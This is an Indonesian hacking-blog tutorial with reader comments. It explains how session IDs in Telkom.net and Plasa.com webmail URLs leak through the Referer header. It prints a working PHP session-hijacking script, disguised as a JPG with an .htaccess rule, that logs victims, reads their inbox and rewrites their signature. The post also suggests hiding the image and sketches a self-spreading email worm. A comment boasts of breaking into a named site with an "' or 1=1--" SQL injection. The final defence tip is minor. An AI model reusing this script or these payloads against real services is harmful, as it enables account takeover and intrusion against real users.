in Web Security

Hacking Email Telkom.net dan Plasa.com

Telkom.net dan Plasa.com adalah fasilitas email gratis yang diberikan oleh PT Telkom. Pengguna email telkomnet dan plasacom patut waswas, karena amat mudah untuk menghack email di sana. Hanya dengan membuka sebuah email yang telah dirancang khusus oleh attacker, email anda bisa menjadi milik attacker. Dalam artikel ini saya akan tunjukkan apa kelemahannya, bagaimana cara mengexploitasi kelemahan itu dan tentu saja bagaimana cara agar terhindar dari serangan itu.

Webmail Session Hijacking

Teknik hacking email dalam artikel ini adalah dengan cara hijacking session. Oleh karena itu teknik ini hanya bisa dilakukan pada webmail telkom.net dan plasa.com, pengguna telkom.net dan plasa.com yang menggunakan Outlook/Thunderbird tidak rentan terhadap serangan ini.

Karena http adalah protokol yang stateless, sedangkan untuk membuat session server harus bisa memantau state user, maka digunakanlah session ID sebagai kunci atau penanda suatu session. Bila sessionID diketahui attacker, maka attacker bisa menguasai session korban. Orang lain, siapapun yang membawa sessionID anda, akan dianggap oleh server sebagai anda. Hijacking session adalah usaha untuk mendapatkan session ID korban, dengan cara predicting, capturing, atau fixating session ID.

SessionID diberikan oleh server dan harus dikembalikan lagi oleh browser (client) setiap kali membuat request. Mekanisme penyimpanan dan pengiriman session ID bisa dilakukan dengan dua cara:

  1. Session Cookie: Session ID diberikan server dalam bentuk cookie dan disimpan oleh browser. Setiap browser melakukan request, cookie tersebut akan dikembalikan ke server lagi sebagai bukti bahwa user tersebut adalah masih orang yang sama.
  2. URL Rewriting: Server menyisipkan session ID dalam halaman html yang dikirimkan ke browser. Session ID tersebut dimasukkan dalam bentuk URL di tag html tertentu seperti link (tag A). Contohnya bila URL link aslinya adalah http://www.somesite.com/inbox.php Oleh server link tersebut akan disisipkan sessionID menjadi:
    INBOX
    

    Dengan cara ini setiap kali user mengklik link tersebut, maka sessionID juga akan dikirim ke server sebagai bukti bahwa user tersebut adalah pengguna session yang sah.

SessionID paling aman disimpan dan dikirim kembali ke server dalam bentuk cookie, apalagi bila cookie tersebut diamankan dengan bit secure atau httponly (baca: protecting cookie with httponly ). Kemungkinan serangan yang bisa dilancarkan untuk mencuri cookie adalah dengan XSS attack dan sniffing attack, kedua jenis serangan itu bisa dicegah dengan bit secure dan httponly.

Bila cookie telah diamankan dengan secure bit, maka cookie tersebut tidak bisa dicuri dengan sniffing karena cookie hanya dikirim melalui https, cookie tersebut juga tidak bisa dicuri dengan serangan XSS karena akses javascript terhadap cookie telah ditutup. Bila cookie hanya dilindungi dengan httponly, maka cookie itu aman dari serangan XSS, namun rentan sniffing bila cookie dikirimkan melalui http biasa.

Berbeda dengan cookie, menyimpan Session ID dalam URL sangatlah berbahaya, karena URL mudah dilihat, dikopi dan disimpan dalam bookmark, log file dan sebagainya. Selain itu sessionID juga bisa bocor ke tempat lain melalui header Referer. Sebab header Referer bertugas membawa URL dimana sebuah request dilakukan. Bila dalam suatu halaman terjadi request untuk mengambil gambar, maka header Referer akan mengandung URL dari halaman tersebut. Dalam artikel ini saya akan menggunakan jurus header Referer untuk membajak session webmail Telkom.net dan Plasa.com. Bagi pemilik situs, tentu sering melihat header ini dengan program statistic seperti Awstats untuk melihat pengunjung situs berasal dari situs mana saja.

telkom.net URL

telkom.net URL


plasa.com URL

plasa.com URL

SessionID webmail Telkom.net dan Plasa.com disimpan pada URL sehingga memudahkan pembajakan session. Mari kita lihat bagaimana bentuk URL webmail telkom.net dan plasa.com:

http://mail.telkom.net/Session/206017-7vY8EVuJF2935NV9Fhzl-kmbcuww/mailbox.wssp?Mailbox=INBOX&
http://mail1.plasa.com/Session/70174-k2O8e3vcnJEFxmxWYpOX-kmbcuwc/mailbox.wssp?Mailbox=INBOX&

Stealing SessionID from Referer Header

Session ID pada URL telkom.net dan plasa.com disisipkan setelah /Session/ hingga karakter / (slash). Sekarang bagaimana caranya attacker bisa mengetahui URL yang sedang dibuka korban di browsernya? Di awal saya sudah menyebutkan sekilas tentang header request yang bernama Referer. Tugas dari header ini adalah mengirimkan URL halaman yang melakukan request. Agar lebih jelasnya mari kita lihat sebuah contoh.

Ketika pengunjung sedang membuka halaman dengan URL:

 
http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/Mailbox.wssp?Mailbox=INBOX

Kemudian ketika terjadi request ke sebuah file image:

http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif 

Maka pada request GET tersebut akan ada header seperti di bawah ini:

GET /Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif HTTP/1.1
Host: mail.telkom.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5 ImageShackToolbar/5.0.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/mailbox.wssp?Mailbox=INBOX&
Cache-Control: max-age=0

Pada baris ke-10 terdapat header Referer yang menunjukkan bahwa request tersebut terjadi ketika kepada user sedang berada di URL tersebut. Karena URL yang direquest adalah http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif, maka web server mail.telkom.net tempat file batal.gif tersebut berada, dapat mengetahui URL ketika request tersebut terjadi. Sekarang bayangkan apa yang terjadi bila request tersebut bukan mendownload image dari mail.telkom.net, tapi dari server www.evilhackersite.com/image.jpg. Web server di www.evilhackersite.com tentu akan mendapatkan URL tempat terjadinya request dari header Referer. Dan karena URL tersebut mengandung Session ID, maka dengan mudah attacker akan membajak session anda.

Attack Scenario

Webmail telkom.net dan plasa.com menggunakan URL sebagai mekanisme pertukaran session ID. Attacker bisa menjebak korban untuk membuka sebuah email yang mengandung gambar yang berlokasi di server attacker. Tag IMG tersebut akan membuat browser korban melakukan request ke server attacker, dengan tentu saja mengirimkan URL korban dalam header Referer. Dengan mengetahui session ID korban, attacker dengan mudah menguasai account webmail korban.

Preparing the Script

Sebelum bisa melakukan serangan, yang pertama harus dilakukan adalah menyiapkan server side script sebagai target request untuk menangkap SessionID korban. Server side script ini akan di-“masking” sebagai file JPG dengan menggunakan mod_rewrite Apache (.htaccess). Server side script yang dimasking sebagai file JPG inilah yang akan dimasukkan dalam tag IMG dalam email yang dibaca korban. Bila korban membaca email attacker, maka akan terjadi request ke server side script itu, sehingga attacker bisa mendapatkan session ID korban dan menguasai emailnya.

URL yang akan kita jadikan tujuan request adalah: http://www.ilmuhacking.com/mylab/image.jpg yang sebenarnya adalah masking untuk server side script http://www.ilmuhacking.com/mylab/checkmail.php. Dengan menggunakan mod_rewrite Apache dan settings .htacess berikut ini masking checkmail.php menjadi image.jpg bisa dilakukan:

RewriteEngine On
RewriteBase /
RewriteRule mylab/image.jpg mylab/checkmail.php

Berikutnya saya harus menyiapkan file checkmail.php. Tugas dari script php itu adalah mendapatkan session ID kemudian langsung membajak session korban bermodalkan session ID tersebut.

-1) {
	$telkomnet = true;
}
if (strpos($ref,"plasa.com")>-1) {
	$plasacom = true;
}
if ($telkomnet===false && $plasacom===false) {
        exit();
}

$file = fopen("daftarkorban.txt","a");
$url_tokens = parse_url($ref);
$host = $url_tokens["host"];
$tokens = explode("/",$ref);
$sessid = $tokens[4];
fwrite($file,"######\n");
fwrite($file,"REFERER:".$_SERVER["HTTP_REFERER"]."\n");
fwrite($file,"SESSID:".$sessid."\n");

$urlhost = "http://$host/Session/$sessid/mailbox.wssp?Mailbox=INBOX&";
$inboxhtml = file_get_contents($urlhost);

preg_match('/(.*?)<\/title>/i', $inboxhtml, $matches);
$title=$matches[1];
$email = $title;
$pos = strpos($title," ");
if ($pos > -1) {
$email = substr($title,0,$pos);
}

fwrite($file,"KORBAN:".$email."\n");
fwrite($file,"******\n");
fclose($file);

$image = ImageCreate($width, $height);
$white = ImageColorAllocate($image, 255, 255, 255);
$black = ImageColorAllocate($image, 0, 0, 0);
$grey = ImageColorAllocate($image, 204, 204, 204);
ImageFill($image, 0, 0, $black);
ImageString($image, 3, 15, 5, $sessid, $white);
ImageString($image, 3, 25, 25, $email, $white);

// Writing Signature...
$url = "http://mail.telkom.net/Session/$sessid/settings.wssp";
if ($plasacom==true) {
	$url = "http://mail1.plasa.com/Session/$sessid/settings1.wssp";
}
$old_settings = file_get_contents($url);
preg_match('/<textarea(.*?)>(.*?)<\/textarea>/i', $old_settings, $matches);
$oldsig = $matches[2];

$data = array();
$data["UserFrom"] = $email;
$newsig = "[YOUR EMAIL HAS BEEN HACKED]".$oldsig;
$data["Signature"] = $newsig;
$data["Update"] = "Update";

$response = doPost($url,$data);
if ((strpos($response,"Updated")>-1 && $telkomnet==true) || $plasacom==true) {
        ImageString($image, 3, 35, 50, "Signature anda berhasil diganti menjadi:" , $white);
        ImageString($image, 3, 45, 65, $newsig , $white);
}
header("Content-Type: image/jpeg");
ImageJpeg($image);
ImageDestroy($image);

function doPost($url,$data) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        $response = curl_exec($ch);
        if(curl_errno($ch))
        {
                $response = curl_error($ch);
        }
        curl_close($ch);
        return $response;
}
?>
</pre>
<p align="justify">
Cara kerja script di atas adalah: Pada baris ke-3 isi header Referer diambil. Kemudian dibuat dan dibuka file daftarkorban.txt. File ini adalah log yang menyimpan daftar korban. Pada baris ke-22, session ID diambil dari header referer. Setelah session ID didapatkan kini script bisa mengubah signature korban, dengan cara mengirimkan POST request ke http://mail.telkom.net/Session/[SESSIONID_KORBAN]/settings.wssp, perhatikan baris ke-65. Setelah mengubah signature korban, pada baris ke-66 sampai baris ke-72, script membuat image dengan pesan “Signature anda berhasil diganti menjadi:”.
</p>
<p align="justify"><b>Launch The Attack</b></p>
<p align="justify">
Oke, kini semua persiapan sudah siap. Kini saatnya kita melancarkan serangan dengan mengirimkan email html yang mengandung tag IMG. Dalam contoh attacker adalah rizki.wicaksono@telkom.net dan korban adalah rizki.wicaksono@plasa.com. Ingat ini hanya contoh, dalam kenyataannya attacker bisa menggunakan email apapun, bahkan email palsu (anonymous). Perhatikan gambar berikut ini yang menunjukan bagaimana email yang berisi jebakan dibuat dan ditujukan untuk korban.
</p>
<div id="attachment_1328" style="width: 254px" class="wp-caption aligncenter"><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/04/attackemail1.png"><img aria-describedby="caption-attachment-1328" loading="lazy" src="http://www.ilmuhacking.com/wp-content/uploads/2009/04/attackemail1-244x300.png" alt="compose attack email" title="attackemail1" width="244" height="300" class="size-medium wp-image-1328" srcset="http://www.ilmuhacking.com/wp-content/uploads/2009/04/attackemail1-244x300.png 244w, http://www.ilmuhacking.com/wp-content/uploads/2009/04/attackemail1.png 509w" sizes="(max-width: 244px) 100vw, 244px" /></a><p id="caption-attachment-1328" class="wp-caption-text">compose attack email</p></div>
<p align="justify">
Dalam gambar tersebut email diisi dengan tag HTML IMG. Perhatikan bahwa saya bisa saja membuat image tersebut invisible dengan memberikan atribut width dan src 0. Dengan membuat image menjadi invisible, korban tidak akan menyadari bahwa emailnya telah dibajak. Tapi untuk contoh saya membiarkan gambar berukuran besar. Berikut ini adalah isi tanda tangan (signature) email korban sebelum email dibuka.
</p>
<p><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/04/signature1.png"><img loading="lazy" src="http://www.ilmuhacking.com/wp-content/uploads/2009/04/signature1-300x144.png" alt="signature1" title="signature1" width="300" height="144" class="aligncenter size-medium wp-image-1330" srcset="http://www.ilmuhacking.com/wp-content/uploads/2009/04/signature1-300x144.png 300w, http://www.ilmuhacking.com/wp-content/uploads/2009/04/signature1.png 653w" sizes="(max-width: 300px) 100vw, 300px" /></a></p>
<p align="justify">
Dan gambar berikut adalah gambar ketika email attacker tiba.</p>
<div id="attachment_1331" style="width: 310px" class="wp-caption aligncenter"><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/04/emailattackertiba.png"><img aria-describedby="caption-attachment-1331" loading="lazy" src="http://www.ilmuhacking.com/wp-content/uploads/2009/04/emailattackertiba-300x97.png" alt="email attacker tiba" title="emailattackertiba" width="300" height="97" class="size-medium wp-image-1331" srcset="http://www.ilmuhacking.com/wp-content/uploads/2009/04/emailattackertiba-300x97.png 300w, http://www.ilmuhacking.com/wp-content/uploads/2009/04/emailattackertiba-1024x332.png 1024w, http://www.ilmuhacking.com/wp-content/uploads/2009/04/emailattackertiba.png 1044w" sizes="(max-width: 300px) 100vw, 300px" /></a><p id="caption-attachment-1331" class="wp-caption-text">email attacker tiba</p></div>
<p align="justify">
Dan gambar berikut adalah gambar ketika email attacker dibuka oleh korban. Pada gambar tersebut terlihat bahwa session id korban dan pesan bahwa signature korban berubah tertulis dalam file image.jpg.
</p>
<div id="attachment_1334" style="width: 310px" class="wp-caption aligncenter"><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/04/emaildibuka.png"><img aria-describedby="caption-attachment-1334" loading="lazy" src="http://www.ilmuhacking.com/wp-content/uploads/2009/04/emaildibuka-300x186.png" alt="victim open email and his session hijacked instantly" title="emaildibuka" width="300" height="186" class="size-medium wp-image-1334" srcset="http://www.ilmuhacking.com/wp-content/uploads/2009/04/emaildibuka-300x186.png 300w, http://www.ilmuhacking.com/wp-content/uploads/2009/04/emaildibuka.png 898w" sizes="(max-width: 300px) 100vw, 300px" /></a><p id="caption-attachment-1334" class="wp-caption-text">victim open email and his session hijacked instantly</p></div>
<p align="justify">
Pada saat korban membuka email dari attacker, pada saat itu juga attacker menguasai penuh account email korban. Dalam contoh artikel ini attacker mengubah signature korban dengan menambahkan string [YOUR EMAIL HAS BEEN HACKED]. Berikut ini adalah gambar signature korban setelah korban membuka email attacker.
</p>
<p><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/04/signature2.png"><img loading="lazy" src="http://www.ilmuhacking.com/wp-content/uploads/2009/04/signature2-300x135.png" alt="signature2" title="signature2" width="300" height="135" class="aligncenter size-medium wp-image-1341" srcset="http://www.ilmuhacking.com/wp-content/uploads/2009/04/signature2-300x135.png 300w, http://www.ilmuhacking.com/wp-content/uploads/2009/04/signature2.png 649w" sizes="(max-width: 300px) 100vw, 300px" /></a></p>
<p align="justify">
<b>Worm Attack: More Dangerous Scenario</b>
</p>
<p align="justify">
Skenario serangan yang lebih berbahaya adalah bila attacker mengeksploitasi kelemahan ini untuk menciptakan worm. Ingat bahwa ketika attacker mendapatkan session ID, pada saat itu attacker memiliki power yang setara dengan korban. Dengan session korban, attacker bisa mengirimkan email serangan yang sama ke calon korban lain yang ada di dalam daftar buku alamat korban. Begitu teman korban membuka email itu, maka session dia juga dalam genggaman attacker dan dia juga akan menyebarkan serangan ke teman-temannya. Hal ini akan memicu reaksi berantai yang berbahaya.
</p>
<p align="justify">
Sulitkah membuat worm seperti itu? Tidak sulit kok, mudah sekali. Semua itu tidak lebih dari kombinasi request GET dan POST dengan berbekal session ID korban. Attacker harus membaca phone book dengan mengirim request HTTP (GET/POST) dengan session ID korban. Setelah itu attacker akan mengirimkan email serangan ke teman-teman korban juga dengan melakukan request HTTP dengan session ID korban. Begitu seterusnya. Tidak sulit bukan, apalagi buat orang yang sudah sering memprogram.
</p>
<p align="justify">
<b>Tips Menghindari Serangan</b>
</p>
<p align="justify">
Karena serangan ini dilakukan dengan membajak session web, maka serangan ini hanya bisa dilakukan bila korban membaca email telkom.net dan plasa.com dengan webmail. Jadi agar terhindar dari serangan ini, gunakanlah akses POP3 atau IMAP untuk membaca email. Dengan menggunakan email client non-web seperti Thunderbird dan Outlook anda akan aman dari serangan ini.</p>

		
									</div>
	<!-- .entry-content -->

			<div class="post-author-bottom">
			<div class="post-author-card">
				<a class="site-logo" href="http://www.ilmuhacking.com">
					<img alt='' src='http://0.gravatar.com/avatar/02817777ecc084a3371ad06706530c81?s=100&d=mm&r=g' srcset='http://0.gravatar.com/avatar/02817777ecc084a3371ad06706530c81?s=200&d=mm&r=g 2x' class='avatar avatar-100 photo u-photo' height='100' width='100' loading='lazy'/>				</a>

				<div class="post-author-info">
					<div class="site-title">
						<span class="byline"><span class="author p-author vcard h-card"><a class="u-url url fn n" href="http://www.ilmuhacking.com" title="View all posts by Rizki Wicaksono" rel="author">Rizki Wicaksono</a></span></span>					</div>

					<div class="site-description"></div>
				</div>
				<div class="post-published-date">
					<h2 class="site-published">Published</h2>
					<h2 class="site-published-date"><a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/" title="Hacking Email Telkom.net dan Plasa.com" rel="bookmark"><time class="entry-date dt-published" datetime="2009-04-29T20:56:02+0700" itemprop="datePublished" pubdate="pubdate">April 29, 2009</time></a></h2>
										
					
				</div>
			</div>
		</div>
		<!-- .post-author-bottom -->
		
	<footer class="entry-meta">
		
					<div id="share-comment-button">
				<button>
					<i class="share-comment-icon"></i>Write a Comment				</button>
			</div>
		
			</footer>
	<!-- .entry-meta -->

</article><!-- #post-1298 -->

				
	<div id="commentform-top"></div> <!-- do not remove; used by jQuery to move the comment reply form here -->
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title"> <small><a rel="nofollow" id="cancel-comment-reply-link" href="/web-security/hacking-email-telkomnet-dan-plasacom/" style="display:none;">Cancel Reply</a></small></h3><form action="http://www.ilmuhacking.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><div id="main-reply-title"><h3>Write a Comment</h3></div><div class="comment-form-reply-title"><p>Comment</p></div><p class="comment-form-comment" id="comment-form-field"><textarea id="comment" name="comment" cols="60" rows="6" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name</label><input id="author" name="author" type="text" value="" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email</label><input id="email" name="email" type="text" value="" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><input id="url" name="url" type="text" value="" /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Submit Comment" /> <input type='hidden' name='comment_post_ID' value='1298' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="51bc4fc463" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="143"/></p></form>	</div><!-- #respond -->
	

	<div id="comments" class="comments-area">
				
							<h2 class="comments-title">
					<i class="comments-title-icon"></i>
					20 Comments				</h2>
			
			
			<ol class="commentlist">
						<li class="comment even thread-even depth-1 u-comment h-cite" id="li-comment-245">
		<article id="comment-245" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://2.gravatar.com/avatar/535644a1e7f2fb53fd940a9c396646aa?s=48&d=mm&r=g' srcset='http://2.gravatar.com/avatar/535644a1e7f2fb53fd940a9c396646aa?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn"><a href='http://gaada' rel='external nofollow ugc' class='url'>rey</a></cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-245">
						<time pubdate datetime="2009-05-04T14:10:58+07:00">
							May 4, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>wahh… artikelx sangat bagus k , sangat menarik ^_^<br />
oia K ..Q mau tanya nie…??<br />
bisa ga klo dilakukan yahoo.co.id / com ~_^ ?</p>
<p>makasi ^_^</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-245' data-commentid="245" data-postid="1298" data-belowelement="comment-245" data-respondelement="respond" data-replyto="Reply to rey" aria-label='Reply to rey'>Reply to rey</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment byuser comment-author-admin bypostauthor odd alt thread-odd thread-alt depth-1 u-comment h-cite" id="li-comment-250">
		<article id="comment-250" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/02817777ecc084a3371ad06706530c81?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/02817777ecc084a3371ad06706530c81?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn"><a href='http://www.ilmuhacking.com' rel='external nofollow ugc' class='url'>Rizki Wicaksono</a></cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-250">
						<time pubdate datetime="2009-05-07T00:44:21+07:00">
							May 7, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p><a href="#comment-245" rel="nofollow">@rey</a><br />
serangan ini bisa dilakukan karena sessionid disimpan dalam URL, sedangkan yahoo menyimpannya dalam cookie. jadi trik ini tdk bisa dipakai utk hacking email yahoo.</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-250' data-commentid="250" data-postid="1298" data-belowelement="comment-250" data-respondelement="respond" data-replyto="Reply to Rizki Wicaksono" aria-label='Reply to Rizki Wicaksono'>Reply to Rizki</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment even thread-even depth-1 u-comment h-cite" id="li-comment-252">
		<article id="comment-252" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/ff6c90c28dba3b7d2fbae07c5899bb9f?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/ff6c90c28dba3b7d2fbae07c5899bb9f?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn">Lufti</cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-252">
						<time pubdate datetime="2009-05-07T08:09:37+07:00">
							May 7, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>Mas gimana kalo yahoo memakai cookie authorized?</p>
<p>saya pernah menemukan cookie (dalam website lain) ini yang sebelumnya authorized=no, saya ubah  memakai javascript injection menjadi authorized=yes,jadi user hanya mengklik login dan login tanpa username dan password.</p>
<p>dan apakah yahoo ini dapat dijebol memakai SQL injection?</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-252' data-commentid="252" data-postid="1298" data-belowelement="comment-252" data-respondelement="respond" data-replyto="Reply to Lufti" aria-label='Reply to Lufti'>Reply to Lufti</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment byuser comment-author-admin bypostauthor odd alt thread-odd thread-alt depth-1 u-comment h-cite" id="li-comment-253">
		<article id="comment-253" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/02817777ecc084a3371ad06706530c81?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/02817777ecc084a3371ad06706530c81?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn"><a href='http://www.ilmuhacking.com' rel='external nofollow ugc' class='url'>Rizki Wicaksono</a></cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-253">
						<time pubdate datetime="2009-05-07T09:11:26+07:00">
							May 7, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p><a href="#comment-252" rel="nofollow">@Lufti</a><br />
kalau web bisa ditembus hanya dengan mengubah cookie seperti itu,berarti securitynya terlalu lemah, tidak mungkin yahoo punya kelemahan seperti itu. aku nggak tau apa ada sql injection di yahoo, belum pernah ada laporan soal itu, tapi tidak ada laporan bukan berarti tidak ada.</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-253' data-commentid="253" data-postid="1298" data-belowelement="comment-253" data-respondelement="respond" data-replyto="Reply to Rizki Wicaksono" aria-label='Reply to Rizki Wicaksono'>Reply to Rizki</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment even thread-even depth-1 u-comment h-cite" id="li-comment-257">
		<article id="comment-257" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/ff6c90c28dba3b7d2fbae07c5899bb9f?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/ff6c90c28dba3b7d2fbae07c5899bb9f?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn">Lufti</cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-257">
						<time pubdate datetime="2009-05-08T12:18:30+07:00">
							May 8, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>Ok mas! gini saya pernah tembus sistem adminx suatu website klo g salah namax soujod.com (website arab) saya tembus adminx pake SQL injection dgn query ‘or 1=1– dan passwordx ‘ or 1=1— juga. saya msh bingung arti script itu apa. tapi yg saya ketahui fungsi or itu kan jika 1 or 1 =1 kan? sya sih udah nguasain beberapa query saja spt Union select, dan lainx tolong mas penjelasanx ttg ‘ or 1=1– ini!.</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-257' data-commentid="257" data-postid="1298" data-belowelement="comment-257" data-respondelement="respond" data-replyto="Reply to Lufti" aria-label='Reply to Lufti'>Reply to Lufti</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment odd alt thread-odd thread-alt depth-1 u-comment h-cite" id="li-comment-258">
		<article id="comment-258" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/ff6c90c28dba3b7d2fbae07c5899bb9f?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/ff6c90c28dba3b7d2fbae07c5899bb9f?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn">Lufti</cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-258">
						<time pubdate datetime="2009-05-08T12:21:42+07:00">
							May 8, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>Mas tolong sediain jga artikel Encryption pake algorithma apa aja!<br />
MD5,MD4 blowfish, RC4,Vigenere, ADFGVXZ dsb. saya baru ngerti ROT-13, Vigenere,ADFGVXZ dan MD4-5 aja hehe tapi tlg donk sdikit ilmu lagi dari Mas Rizki biar bertambah.</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-258' data-commentid="258" data-postid="1298" data-belowelement="comment-258" data-respondelement="respond" data-replyto="Reply to Lufti" aria-label='Reply to Lufti'>Reply to Lufti</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment even thread-even depth-1 u-comment h-cite" id="li-comment-259">
		<article id="comment-259" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/6e598fa4876631c06cff37e3444219fb?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/6e598fa4876631c06cff37e3444219fb?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn"><a href='http://mujie.blog.niwakarya.com/' rel='external nofollow ugc' class='url'>Mujie</a></cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-259">
						<time pubdate datetime="2009-05-11T12:30:28+07:00">
							May 11, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>Wahahah create images on the fly, padahal kode PHP dibelakangnya. Artikel yang bagus 🙂</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-259' data-commentid="259" data-postid="1298" data-belowelement="comment-259" data-respondelement="respond" data-replyto="Reply to Mujie" aria-label='Reply to Mujie'>Reply to Mujie</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment odd alt thread-odd thread-alt depth-1 u-comment h-cite" id="li-comment-295">
		<article id="comment-295" class="comment">
			<footer>
				<div class="comment-author vcard">
